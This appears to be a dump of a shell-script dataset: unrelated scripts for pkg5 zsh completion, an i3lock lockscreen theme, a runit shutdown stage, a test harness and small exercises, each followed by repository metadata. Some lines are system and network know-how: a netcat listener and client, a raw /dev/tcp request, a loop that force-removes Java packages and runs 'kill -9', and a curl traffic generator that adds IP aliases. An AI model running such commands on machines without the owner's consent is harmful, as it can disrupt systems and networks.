pkga=( ${(s:/:)pkg} )
for i in {1..$#pkga}; do
print ${(j:/:)${pkga[$i,-1]}}
done
done) )
_store_cache $cache_id _pkg5_installed_pkgs
fi
compadd "$@" - ${_pkg5_installed_pkgs}
}
_pkg5_pkgs_a() {
local cache_policy cache_id=pkg5_known_pkgs:$HOST:${pkg5_root//\//+}
typeset -a -g _pkg5_known_pkgs
zstyle -s ":completion:${curcontext}:" cache-policy cache_policy
if [[ -z "$cache_policy" ]]; then
zstyle ":completion:${curcontext}:" cache-policy _pkg5_known_caching_policy
fi
if ( [[ $#_pkg5_known_pkgs -eq 0 ]] || _cache_invalid $cache_id ) && ! _retrieve_cache $cache_id; then
_pkg5_known_pkgs=( $(
pkg -R $pkg5_root list -aH --no-refresh | while read pkg junk; do
pkga=( ${(s:/:)pkg} )
for i in {1..$#pkga}; do
print ${(j:/:)${pkga[$i,-1]}}
done
done) )
_store_cache $cache_id _pkg5_known_pkgs
fi
compadd "$@" - ${_pkg5_known_pkgs}
}
_pkg5_avoided_pkgs() {
compadd "$@" - $(pkg -R $pkg5_root unavoid)
}
_pkg5_pubs() {
compadd "$@" - $(pkg -R $pkg5_root publisher -H | awk '{print $1}')
}
_pkg5_variants() {
compadd "$@" - $(pkg -R $pkg5_root variant -H | awk '{print $1}')
}
_pkg5_facets() {
compadd "$@" - $(pkg -R $pkg5_root facet -H | awk '{print $1}')
}
_pkg5_known_caching_policy() {
[[ $pkg5_root/var/pkg/state/known/catalog.attrs -nt "$1" ]]
}
_pkg5_installed_caching_policy() {
[[ $pkg5_root/var/pkg/state/installed/catalog.attrs -nt "$1" ]]
}
_pkg5() {
local expl context state line pkg5_root prop
typeset -A opt_args
local -a subcmds pkg5_actions pkg5_cattr pkg5_sattr be_opts
local -a publisher_properties image_properties certs
subcmds=(
install uninstall list update refresh version help
info search verify fix revert contents image-create
{change-,}{variant,facet} avoid unavoid history
{{un,}set-,}property {add,remove}-property-value
{{un,}set-,}publisher purge-history rebuild-index
update-format freeze unfreeze {{un,}set-,}mediator
)
pkg5_actions=(
set depend dir driver file group hardlink legacy license link
signature unknown user
)
# Pseudo attributes for the contents subcommand
pkg5_cattr=(
action.hash action.key action.name action.raw
pkg.fmri pkg.name pkg.publisher pkg.shortfmri
)
# Pseudo attributes for the search subcommand
pkg5_sattr=(
$pkg5_cattr search.match search.match_type
)
publisher_properties=(
"signature-policy:value:(ignore verify require-signatures require-names)"
"signature-required-names:value:"
)
image_properties=(
"be-policy:value:(default always-new create-backup when-required)"
"ca-path:value:_path_files -/"
"check-certificate-revocation:value:(true false)"
"flush-content-cache-on-success:value:(true false)"
"mirror-discovery:value:(true false)"
"send-uuid:value:(true false)"
"signature-policy:value:(ignore verify require-signatures require-names)"
"signature-required-names:value:"
"trust-anchor-directory:value:_path_files -/"
"use-system-repo:value:(true false)"
)
if [[ $service == "pkg" ]]; then
_arguments -C -A "-*" \
'(-\? --help)'{-\?,--help}'[Help]' \
'-R[Root directory]:directory:_path_files -/' \
'*::command:->subcmd' && return 0
if (( CURRENT == 1 )); then
_wanted commands expl "pkg subcommand" compadd -a subcmds
return
fi
service="$words[1]"
curcontext="${curcontext%:*}=$service:"
fi
pkg5_root=${${${opt_args[-R]}:-$PKG_IMAGE}:-/}
certs=( $(pkg -R $pkg5_root property -H ca-path | awk '{print $2}')/* )
# Options common to subcommands which might have to deal with BEs.
# Note that --backup-be-name needs to precede --be-name in order to
# ensure that completion sees "--b" as being ambiguous.
be_opts=(
"(--require-new-be)--deny-new-be[Fail the operation if a new BE would be required]"
"(--deny-new-be)--require-new-be[Force a new BE to be created]"
"--backup-be-name[Specify the name for the backup BE]:BE name: "
"--be-name[Specify a BE name]:BE name: "
"--no-be-activate[Don't activate the new BE]"
"(--require-backup-be)--no-backup-be[Don't leave behind a backup BE]"
"(--no-backup-be)--require-backup-be[Force leaving behind a backup BE]"
)
case $service in
("install")
_arguments -A "-*" \
'-n[Dry run]' \
'-q[Quiet]' \
'-v[Verbose]' \
'-g[Specify additional source of packages]:source:_path_files -/' \
"--accept[Accept all licenses]" \
"--licenses[Display all licenses]" \
"--reject[Specify an FMRI to exclude from the result]:fmri:_pkg5_pkgs" \
"--no-refresh[Don't refresh catalogs]" \
"--no-index[Don't reindex search database]" \
$be_opts \
'*:package:_pkg5_pkgs_a'
;;
("uninstall")
_arguments -A "-*" \
'-n[Dry run]' \
'-q[Quiet]' \
'-v[Verbose]' \
$be_opts \
"--no-index[Don't reindex search database]" \
'*:package:_pkg5_pkgs'
;;
("update")
_arguments -A "-*" \
"-f[Don't check for pkg(5) updates]" \
'-n[Dry run]' \
'-q[Quiet]' \
'-v[Verbose]' \
'-g[Specify additional source of packages]:source:_path_files -/' \
"--accept[Accept all licenses]" \
"--licenses[Display all licenses]" \
$be_opts \
"--reject[Specify an FMRI to exclude from the result]:fmri:_pkg5_pkgs" \
"--no-refresh[Don't refresh catalogs]" \
"--no-index[Don't reindex search database]" \
'*:package:_pkg5_pkgs'
;;
("list")
_arguments -A "-*" \
'-H[Omit headers]' \
'-a[Show not-installed packages]' \
'-f[Show all versions]' \
'-g[Specify additional source of packages]:source:_path_files -/' \
'-n[Show newest versions]' \
'-s[Show summaries]' \
'-u[Show upgradable versions]' \
'-v[Show verbose pkg: FMRIs]' \
"--no-refresh[Don't refresh catalogs]" \
'*:package:_pkg5_pkgs_a'
;;
("refresh")
_arguments -A "-*" \
"--full[Full refresh]" \
'*:publisher:_pkg5_pubs'
;;
("info")
_arguments -A "-*" \
'--license[Display license text(s)]' \
'(-r)-l[Installed package]' \
'(-l)-r[Uninstalled package; fetch info from depot]:*:package:_pkg5_pkgs_a' \
'*:package:_pkg5_pkgs'
;;
("search")
_arguments -A "-*" \
"(-p)-a[Show matching actions]" \
'-l[Local search]' \
'(-a)-p[Show packages]' \
'-r[Remote search]' \
'-H[Omit headers]' \
'-I[Case sensitive search]' \
'-s[Depot URI]' \
'*-o[Attribute output]:attributes:_values -s , "attribute" $pkg5_sattr' \
':query:'
;;
("verify")
_arguments -A "-*" \
'-H[Omit headers]' \
'-q[Quiet]' \
'-v[Verbose]' \
'*:package:_pkg5_pkgs'
;;
("fix")
_arguments -A "-*" \
'--accept[Accept all licenses]' \
'--licenses[Display all licenses]' \
'*:package:_pkg5_pkgs'
;;
("revert")
_arguments -A "-*" \
'-n[Dry run]' \
'-v[Verbose]' \
'--tagged[Revert all tagged files]:tag:' \
$be_opts \
"--no-refresh[Don't refresh catalogs]" \
"--no-index[Don't reindex search database]" \
'*:file:_path_files'
;;
("contents")
_arguments -A "-*" \
'-H[Omit headers]' \
'-m[Print raw manifests]' \
'*-a[Attribute matching]:attribute=pattern:' \
'*-o[Attribute output]:attributes:_values -s , "attribute" $pkg5_cattr' \
'*-s[Sort key]:attribute:' \
'*-t[Action type]:action:_values -s , "action" $pkg5_actions' \
'-r[Fetch manifests from depot]:*:package:_pkg5_pkgs_a' \
'*:package:_pkg5_pkgs'
;;
("image-create")
_arguments -A "-*" \
'(-f --force)'{-f,--force}'[Force image creation]' \
'(-F --full -P --partial -U --user)'{-F,--full}'[Full image]' \
'(-F --full -P --partial -U --user)'{-P,--partial}'[Partial image]' \
'(-F --full -P --partial -U --user)'{-U,--user}'[User image]' \
'(-z --zone)'{-z,--zone}'[Zoned image]' \
'-k[Path to SSL key]:file:_path_files' \
'-c[Path to SSL cert]:file:_path_files' \
"--no-refresh[Don't refresh catalogs]" \
"*--variant[Specify image variants]:variant=instance:" \
"*--facet[Specify image facets]:facet=True/False:" \
'(-p --publisher)'{-p,--publisher}'[Specify publisher]:prefix=URI:' \
':directory:_path_files -/'
;;
("change-variant")
_arguments -A "-*" \
'-n[Dry run]' \
'-q[Quiet'] \
'-v[Verbose'] \
'-g[Specify additional source of packages]:source:_path_files -/' \
'--accept[Accept all licenses]' \
'--licenses[Display all licenses]' \
$be_opts \
"*:variant:_values -s , 'variant' $(pkg -R $pkg5_root variant -H | awk '{print $1}')" \
;;
("change-facet")
_arguments -A "-*" \
'-n[Dry run]' \
'-q[Quiet'] \
'-v[Verbose'] \
'-g[Specify additional source of packages]:source:_path_files -/' \
'--accept[Accept all licenses]' \
'--licenses[Display all licenses]' \
$be_opts \
"*:facet:_values -s , 'facet' $(pkg -R $pkg5_root facet -H | awk '{print $1}')" \
;;
("variant")
_arguments -A "-*" \
'-H[Omit headers]' \
'*:variant:_pkg5_variants'
;;
("facet")
_arguments -A "-*" \
'-H[Omit headers]' \
'*:facet:_pkg5_facets'
;;
("avoid")
_arguments -A "-*" \
'*:package:_pkg5_pkgs_a'
;;
("unavoid")
_arguments -A "-*" \
'*:package:_pkg5_avoided_pkgs'
;;
("set-property")
_arguments -A "-*" \
':property:_values "property" $image_properties' \
':value:'
;;
("add-property-value")
_arguments -A "-*" \
':property:_values "property" $image_properties' \
':value:'
;;
("remove-property-value")
_arguments -A "-*" \
':property:(${image_properties%%\:*})' \
':value:'
;;
("unset-property")
_arguments -A "-*" \
'*:property:(${image_properties%%\:*})'
;;
("property")
_arguments -A "-*" \
'-H[Omit headers]' \
'*:property:(${image_properties%%\:*})'
;;
("set-publisher")
_arguments -A "-*" \
'-P[Make preferred]' \
'(-e --enable)'{-e,--enable}'[Enable publisher]' \
'(-d --disable)'{-d,--disable}'[Disable publisher]' \
'(-g --add-origin)'{-g,--add-origin}'[Add origin URI]:uri:' \
'(-G --remove-origin)'{-G,--remove-origin}'[Remove origin URI]:uri:' \
'(-m --add-mirror)'{-m,--add-mirror}'[Add mirror URI]:uri:' \
'(-M --remove-mirror)'{-M,--remove-mirror}'[Remove mirror URI]:uri:' \
'-p[Repository URI]:url:' \
"--no-refresh[Don't refresh catalogs]" \
'--reset-uuid[Reset the image UUID for this publisher]' \
'--sticky[Make this publisher sticky]' \
'--non-sticky[Make this publisher non-sticky]' \
'--search-after[Set publisher search-order]:publisher:_pkg5_pubs' \
'--search-before[Set publisher search-order]:publisher:_pkg5_pubs' \
'--approve-ca-cert[Add trusted CA certificate]:CA cert path:_path_files' \
'--revoke-ca-cert[Revoke CA certificate]:CA cert hash:(${${certs#/etc/openssl/certs/}%.0})' \
'--unset-ca-cert[Remove trusted CA certificate]:CA cert hash:' \
'--set-property[Set publisher property]:property:_values "property" $publisher_properties' \
'--unset-property[Remove publisher property]:property:(${publisher_properties%%\:*})' \
'--add-property-value[Add publisher property value]:property:_values "property" $publisher_properties' \
'--remove-property-value[Remove publisher property value]:property:(${publisher_properties%%\:*})' \
':publisher:_pkg5_pubs'
;;
("unset-publisher")
_arguments -A "-*" \
'*:publisher:_pkg5_pubs'
;;
("publisher")
_arguments -A "-*" \
'-H[Omit headers]' \
'-P[Display only preferred publisher]' \
'-n[Display only enabled publishers]' \
'*:publisher:_pkg5_pubs'
;;
("history")
local -a hist_columns
hist_columns=(
"be" "be_uuid" "client" "client_ver" "command" "finish"
"id" "new_be" "new_be_uuid" "operation" "outcome"
"reason" "snapshot" "start" "time" "user"
)
_arguments -A "-*" \
'-H[Omit headers]' \
'-l[Long history]' \
'-n[Last n records]:number:' \
'-o[Column]:number:_values -s , "column" $hist_columns' \
'-t[Time range]'
;;
("freeze"|"unfreeze")
;;
("mediator"|"set-mediator"|"unset-mediator")
;;
(*)
_message "unknown pkg subcommand: $service" ;;
esac
}
_pkg5 "$@"
# vim:ft=zsh
| true
|
94ec34271d8a2da89e15068eb149a39bf92f7466
|
Shell
|
ivucica/advent-of-code-2017
|
/day2/day2_test.sh
|
UTF-8
| 332
| 3.484375
| 3
|
[] |
no_license
|
#!/bin/bash
set -e
if [[ -nz "${TEST_SRCDIR}" ]]; then
BIN="${TEST_SRCDIR}"/"${TEST_WORKSPACE}"/day2/day2
else
BIN="$(dirname "$0")/day2"
fi
_failed=0
_out="$("${BIN}" << _EOF
5 1 9 5
7 5 3
2 4 6 8)"
if [[ ${_out} != 18 ]] ; then
echo "expected = 18, got = ${_out}"
_failed=1
fi
if [[ ${_failed} == 1 ]] ; then
exit 1
fi
| true
|
f385c5d9809d4d32cc35c1c54cbf5c0bd3f318bc
|
Shell
|
xuyueshu/YZQREPO
|
/shell_test/uninstall_java.sh
|
UTF-8
| 297
| 3.21875
| 3
|
[
"Unlicense"
] |
permissive
|
#!/bin/bash
##脚本删除linux系统中自带jdk
while :
do
file=`rpm -qa | grep java`
length=${#file[@]}
if [ $length -gt 0 ];then
yum remove -y ${file[0]}
else
echo "删除完毕!"
break
fi
done
ps -auxf | grep 'uninstall_java.sh' | grep -v grep | awk '{print $2}'| xargs kill -9
| true
|
16f5cfc13c5975b47beef3ab8df1aa13939dd4e9
|
Shell
|
misterwavey/nxtmail
|
/server/sender.sh
|
UTF-8
| 228
| 2.828125
| 3
|
[] |
no_license
|
#!/bin/bash
for i in "$@"
do
echo $i
n=`printf "\x%1x" $i`
var=$var$n
done
echo "var is now $var"
#gnu-netcat
echo -en "$var" | timeout 1 nc -x 127.0.0.1 8080
#openbsd-netcat
#echo -en "$var" | timeout 1 nc 127.0.0.1 8080
| true
|
624da860d9e4a89a6c8264247ac25fa8d919baa5
|
Shell
|
thombowles/trafficgen
|
/trafficgen.sh
|
UTF-8
| 1,238
| 3.8125
| 4
|
[] |
no_license
|
#!/bin/bash
# generate network traffic by using curl(ing) desturl from a range of IP addresses
# v1.1 - added cidr support
SECONDS=0 # dont change - used for figuring script run time
# user configurable vars:
desturl=google.com
network=192.168.20.
cidr=24
firstIP=240
lastIP=250
repeat=20
interface=ens192
# space-separated list of ports
ports=(80)
for itteration in $(seq 1 $repeat); do
for ip in $(seq $firstIP $lastIP); do
#echo ===========
#echo LOOP $itteration
#echo ===========
# make sure the alias is not already configured
sudo ifconfig $interface:$ip down
# create the alias
sudo ifconfig $interface:$ip $network$ip/$cidr up
# curl to desturl on each port from alias ip
for i in ${ports[@]}; do
echo =========================================================
echo REPEAT $itteration
echo SENDING TRAFFIC TO $desturl:$i FROM $network$ip
echo =========================================================
curl --interface $interface:$ip $desturl:$i --insecure
sleep 1
done
# tear down the alias
sudo ifconfig $interface:$ip down
done
done
duration=$SECONDS
echo -----------------
echo FINISHED in $(($duration / 60))m $(($duration % 60))s
echo -----------------
| true
|
3c2b1714a6edccf6cc71d753550b415bca8e51f2
|
Shell
|
acoutoal/rnaseq
|
/script_flagstat_worker.sh
|
UTF-8
| 1,822
| 2.796875
| 3
|
[] |
no_license
|
#!/bin/bash
# partition (queue)
#SBATCH -N 1
# number of nodes
#SBATCH -n 1
# number of cores
#SBATCH --mem 100G
echo "##################################################################"
echo FLAGSTAT Worker
echo Running on host `hostname`
echo Time is `date`
echo Directory is `pwd`
echo Running shell from $SHELL
echo "##################################################################"
echo $0 $1;echo;echo
line=$1
echo $line;echo
PATH=$PATH:/media/shared_data/software/QTLtools_1.0
GTFFILE=/media/shared_data/data/gencode.v19.annotation.gtf
THREAD_NO=4
#line=21
#indir=/media/shared_data/data/adipose_out/$line/reference
#indir=/media/shared_data/data/skin_out/$line/reference
#indir=/media/shared_data/data/LCL_out/$line/reference
indir=/media/shared_data/data/blood_out/$line/reference
#outdir=/media/shared_data/alex/proj/exonquant/results/adipose
#outdir=/media/shared_data/alex/proj/exonquant/results/skin
#outdir=/media/shared_data/alex/proj/exonquant/results/lcl
outdir=/media/shared_data/alex/proj/exonquant/results/blood
mytemp=/tmp/alex
#Print current dir
echo "Current dir: "`pwd`
echo "Input dir: "$indir
echo "Output dir: "$outdir
echo "Input file: "$indir/$line'_ref.Aligned.sortedByCoord.out.bam'
echo "Output file: "$outdir/$line/reference/$line'.flagstat'
#wait between 1-5s before moving data around the cluster
sleep $(( ( RANDOM % 3 ) + 1 ))
#Copy files to tmp dir
samtools flagstat $indir/$line'_ref.Aligned.sortedByCoord.out.bam' > $outdir/$line/reference/$line'.flagstat'
#Job statistics
echo `sstat --format=AveCPU,MaxRSS,MaxVMSize,JobID -j $SLURM_JOB_ID`
echo "##################################################################"
echo Finished running script on host `hostname`
echo Time is `date`
echo "##################################################################"
| true
|
6fcfc651bbe1b812dc466561912de76bed574d18
|
Shell
|
AprilOneDay/k8s
|
/install/install-node.sh
|
UTF-8
| 405
| 2.703125
| 3
|
[] |
no_license
|
#!/bin/bash
TOKEN=$1
MASTER_IP=$2
if [ ! $TOKEN ]; then
echo 'error:plase input [ $1 ] -- 请输入[ TOKEN ]'
exit
fi
if [ ! $MASTER_IP ]; then
echo 'error:plase input [ $2 ] -- 请输入[ MASTER_IP:prot ]'
exit
fi
kubeadm join --token ${TOKEN} ${MASTER_IP} --discovery-token-unsafe-skip-ca-verification
# 安装nfs客服端
yum -y install nfs-utils
systemctl start nfs && systemctl enable nfs
| true
|
f3ac65a30e83fae97a189708c091c0b951439230
|
Shell
|
acloserview/mantablockscreen
|
/mantablockscreen.in
|
UTF-8
| 5,673
| 3.34375
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/env bash
wallpaper=$2
cachepath=$HOME/.cache/mantablockscreen
cropuser=$cachepath/$USER-pic-crop.png
fullname=`getent passwd $USER | cut -d ":" -f 5 | cut -d "," -f 1`
full_alias="${fullname} (${USER})"
if [[ -n $fullname ]]; then
full_alias="${fullname} (${USER})"
else
full_alias=$USER
fi
width=$(xrandr --query | grep ' connected' | grep -o '[0-9][0-9]*x[0-9][0-9]*[^ ]*' | sed -r 's/^[^0-9]*([0-9]+x[0-9]+).*$/\1/' |cut -d "x" -f 1 |head -n1)
height=$(xrandr --query | grep ' connected' | grep -o '[0-9][0-9]*x[0-9][0-9]*[^ ]*' | sed -r 's/^[^0-9]*([0-9]+x[0-9]+).*$/\1/' |cut -d "x" -f 2 |head -n1)
half_width=$((width/2))
half_height=$((height/2))
fg_color=fefefeff
wrong_color=f82a11aa
highlight_color=39393999
verif_color=fefefe66
cropuser() {
ava_home=$HOME/.face
ava_var=/var/lib/AccountsService/icons/$USER
userpic=@pkgdatadir@/userpic.png
if [[ -e $ava_home ]]; then
userpic=$ava_home
elif [[ -e $ava_var ]]; then
userpic=$ava_var
fi
convert $userpic -resize 100x100 -gravity Center \( \
-size 100x100 xc:Black \
-fill White \
-draw "circle 50 50 50 1" \
-alpha Copy\
\) -compose CopyOpacity -composite -trim $cropuser
}
cropbg() {
convert "$wallpaper" -resize ${width}x -gravity center -crop ${width}x${height}+0+0 +repage \( \
-size 120x140 xc:none \
\) -gravity south -compose over -composite $cachepath/resize.png
}
blurbg() {
convert "$cachepath/resize.png" \
-filter Gaussian \
-blur 0x8 \
"$cachepath/resize-blur.png"
}
genbg() {
echo "Caching image ..."
if [[ ! -d $HOME/.cache/mantablockscreen ]]; then
mkdir $HOME/.cache/mantablockscreen
fi
cropuser
cropbg
blurbg
composite -geometry "+$((half_width-50))+$((half_height-130))" $cropuser $cachepath/resize-blur.png $cachepath/resize-pic-blur.png
composite -geometry "+$((half_width-50))+$((half_height+10))" $cropuser $cachepath/resize-blur.png $cachepath/resize-pic-sc-blur.png
echo "Finished caching image"
}
slowfade () {
dis=$(echo -n "$DISPLAY" | tr -c '[:alnum:]' _)
ifc='com.github.chjj.compton'
obj='/com/github/chjj/compton'
if [[ "$1" == "start" ]]; then
dbus-send --print-reply --dest=$ifc.$dis \
$obj $ifc.opts_set string:fade_in_step double:0.02
dbus-send --print-reply --dest=$ifc.$dis \
$obj $ifc.opts_set string:fade_out_step double:0.02
else
dbus-send --print-reply --dest=$ifc.$dis \
$obj $ifc.opts_set string:fade_in_step double:0.1
dbus-send --print-reply --dest=$ifc.$dis \
$obj $ifc.opts_set string:fade_out_step double:0.1
fi
}
lock() {
slowfade start
i3lock -n --force-clock -i $cachepath/resize-pic-blur.png \
--ind-pos="w/2:h/2+60" --time-pos="w-100:h-70" --date-pos="w-115:h-40" --greeter-pos="w/2:h/2" \
--insidever-color=$fg_color --insidewrong-color=$wrong_color --inside-color=fefefe00 \
--ringver-color=$verif_color --ringwrong-color=$wrong_color --ring-color=$fg_color \
--keyhl-color=$highlight_color --bshl-color=$highlight_color --separator-color=00000000 \
--date-color=$fg_color --time-color=$fg_color --greeter-color=$fg_color \
--time-str="%H:%M" --time-size=50 \
--date-str="%a, %b %d" --date-size=30 \
--greeter-text="$full_alias" --greeter-size=25\
--line-uses-ring \
--radius 38 --ring-width 3 --indicator \
--verif-text="" --wrong-text="" --noinput-text="" \
--clock --date-font="SF Pro Display" --time-font="SF Pro Display"
sleep 1
slowfade end
}
stackclock() {
slowfade start
date_now=$(date +'%b, %d')
i3lock -n --force-clock -i $cachepath/resize-pic-sc-blur.png \
--ind-pos="w/2:h/2+60" --time-pos="w/2:h/2-100" --date-pos="w/2:h/2-30" --greeter-pos="w/2:h/2" \
--insidever-color=$verif_color --insidewrong-color=$wrong_color --inside-color=fefefe00 \
--ringver-color=$verif_color --ringwrong-color=$wrong_color --ring-color=$fg_color \
--keyhl-color=$highlight_color --bshl-color=$highlight_color --separator-color=00000000 \
--date-color=$fg_color --time-color=$fg_color --greeter-color=$fg_color \
--time-str="%H" --time-size=70 \
--date-str="%M" --date-size=70 \
--greeter-text="$date_now" --greeter-size=25\
--line-uses-inside --radius 50 --ring-width 2 --indicator \
--verif-text="" --wrong-text="" --noinput-text="" \
--clock --date-font="Abel" --time-font="Abel"
sleep 1
slowfade end
}
circleclock() {
slowfade start
i3lock -n --force-clock -i $cachepath/resize-blur.png \
--ind-pos="w/2:h/2" --time-pos="w/2:h/2-5" --date-pos="w/2:h/2+35" --greeter-pos="w/2:h/2" \
--insidever-color=5f5f5f66 --insidewrong-color=$wrong_color --inside-color=5f5f5f66 \
--ringver-color=$verif_color --ringwrong-color=$wrong_color --ring-color=$fg_color \
--keyhl-color=$highlight_color --bshl-color=$highlight_color --separator-color=00000000 \
--date-color=$fg_color --time-color=$fg_color --greeter-color=$fg_color \
--time-str="%H | %M" --time-size=40 \
--date-str="%a, %d %b" --date-size=25 \
--greeter-text="$date_now" --greeter-size=25 \
--line-uses-inside --radius 75 --ring-width 2 --indicator \
--verif-text="" --wrong-text="" --noinput-text="" \
--clock --date-font="Abel" --time-font="Abel"
sleep 1
slowfade end
}
show_help(){
cat <<-EOF
Usage :
mantablockscreen [OPTION]
Avaible options:
-i, --image Generate cache image
-sc, --stackclock Show lockscreen with stacked digital clock
-cc, --circleclock Show lockscreen with clock inside circle
-h, --help Show this help
EOF
}
case $1 in
-i|--image)
genbg $2 ;;
-h|--help)
show_help ;;
-sc|--stackclock)
stackclock ;;
-cc|--circleclock)
circleclock ;;
*)
lock ;;
esac
| true
|
f9a5108af9bb485de53692d80efaaf2576361427
|
Shell
|
pablogonz/Echoserver-lorenzo
|
/echoslorenzo.sh
|
UTF-8
| 793
| 2.609375
| 3
|
[] |
no_license
|
#Eejercicios 1 y 2 de la tarea de scokets
# 1) Echo server y client con 2 consolas
# OjO: Se debe instalar instalar netcat para que esa 100% funcional, para ello se utiliza el codigo siguiente: sudo apt-get install netcat
#En la primera consola(server) se inserta el siguiente comando
nc -l -p 5353
#el puerto 5353 es uno de lo que tiene mi ordenador, debe asegurarse de utilizar uno de los de su ordenador
# En la segunda consola(client) se introduce el siguiente comando
nc localhost 5353
#Despues de establecer estos 2 pasos ya sera posible entablar una comunciacion entre el servidor y el cliente
#2) Leer una url de una pagina publica
#en este caso utilizamos tcp
exec 3<>/dev/tcp/youtube.com/80
echo -e "GET / HTTP/1.1\nHost: youtube.com\n\n" >&3
cat <&3
| true
|
19ff53de15587826eb2d067f50f22f6c6c8ef688
|
Shell
|
germanfica/MacOS-ZSHTM
|
/install.sh
|
UTF-8
| 415
| 3
| 3
|
[
"MIT"
] |
permissive
|
#!/bin/sh
RED="\033[1;31m"
GREEN="\033[1;32m"
NOCOLOR="\033[0m"
# Copiamos el config
cp .zshrc ~
# Descargamos .git-prompt.sh
curl https://raw.githubusercontent.com/git/git/master/contrib/completion/git-prompt.sh --output .git-prompt.sh
# Le modificamos los permisos
chmod +x-w .git-prompt.sh
# Lo movemos a la raíz
mv .git-prompt.sh ~
echo [100%] "${GREEN}Instalación exitosa"
# Reiniciamos la consola
exec zsh
| true
|
c41f1dd2aa0ec9a19c2e22edb18f73134adfe445
|
Shell
|
pjlintw/Meta-BERT
|
/scripts/meta_exps_2.sh
|
UTF-8
| 374
| 2.640625
| 3
|
[] |
no_license
|
#!/bin/sh
# Run meta-training script`
for num_domain in 1 3 5 50;
do
for num_task in 100;
do
echo "Execute meta-training script with ${num_task} training tasks from ${num_domain} domains."
python run_meta_training.py \
--output_dir results/meta.nt-$num_task.nd-$num_domain \
--num_train_task $num_task \
--num_domain $num_domain \
--gpu_id 2
done
done
| true
|
26453185005ca791deb2ee9532da4b301f16a284
|
Shell
|
cloux/runit
|
/debian/contrib/3
|
UTF-8
| 414
| 2.96875
| 3
|
[
"BSD-3-Clause",
"BSD-2-Clause"
] |
permissive
|
#!/bin/sh
exec 2>&1
PATH=/sbin:/usr/sbin:/bin:/usr/bin
LAST=0
# While test -x is more natural, it does not consider file with
# executable bit set on 'noexec' filesystem as executable, and /run
# often is mounted as 'noexec'.
[ $(stat -c %a /run/runit.reboot) = 100 ] && LAST=6
echo 'Waiting for services to stop...'
sv force-stop /etc/service/*
sv exit /etc/service/*
echo 'Shutdown...'
/etc/init.d/rc $LAST
| true
|
b47607cd6f7af2545f7ab06088f10ff52d2aa2d3
|
Shell
|
rakibulislam01/bash-scripting
|
/2_script_input_stdin.sh
|
UTF-8
| 281
| 3.3125
| 3
|
[
"Apache-2.0"
] |
permissive
|
#!/bin/bash
# for permission use: chmod +x script_2.sh
#6-Script input
# shellcheck disable=SC2016
: '
#echo $1 $2 $2
args=("$@") # for multiple input
echo "${args[0]}"
echo "$@"
echo "$#" # length of the array
'
while read line; do
echo "$line"
done < "${1:-/dev/stdin}"
| true
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.